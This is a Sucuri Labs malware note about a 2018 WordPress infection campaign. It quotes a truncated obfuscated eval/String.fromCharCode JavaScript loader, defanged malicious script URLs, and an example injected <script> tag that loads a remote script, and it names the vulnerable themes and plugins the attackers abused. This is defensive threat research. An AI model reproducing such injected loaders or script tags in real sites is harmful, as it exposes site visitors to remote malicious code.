• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Multi-Vector WordPress Infection from Examhome

September 18, 2018Denis Sinegubko

FacebookTwitterSubscribe

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js, .php files and the WordPress database.>

The script looks like this:

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101,...skipped... 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125))

If you decode it, it injects scripts from hxxps://ads.voipnewswire[.]net/ad.js and later hxxps://examhome[.]net/stat.js?v=1.0.2. Some other related URLs are hxxps://cdn.allyouwant[.]online/main.js?t=c and hxxps://mp3menu[.]org/mp3.js,/b>.

Sometimes links to such scripts may be injected into wp_posts tables without any obfuscation whatsoever, e.g.

<script src='hxxps://cdn.examhome[.]net/cdn.js?ver=1.0.5' type='text/javascript'></script>

Many different attack vectors are being used in this campaign. The location of the malware varies a lot. The more common versions of this malware can be found in .js files that have jquery in their names. Or they are injected into settings of vulnerable WordPress themes and plugins, for example, very old tagDiv themes (Newspaper, Newsmag and their derivatives) or unpatched Smart Google Code Inserter plugin.

FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, WordPress SecurityTags: Labs Note, Malware

About Denis Sinegubko

Denis Sinegubko is Sucuri’s Senior Malware Researcher who joined the company in 2013. Denis' main responsibilities include researching emerging threats and creating signatures for SiteCheck. The founder of UnmaskParasites, his professional experience covers over 20 years of programming and information security. When Denis isn’t analyzing malware, you might not find him online at all. Connect with him on Twitter.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.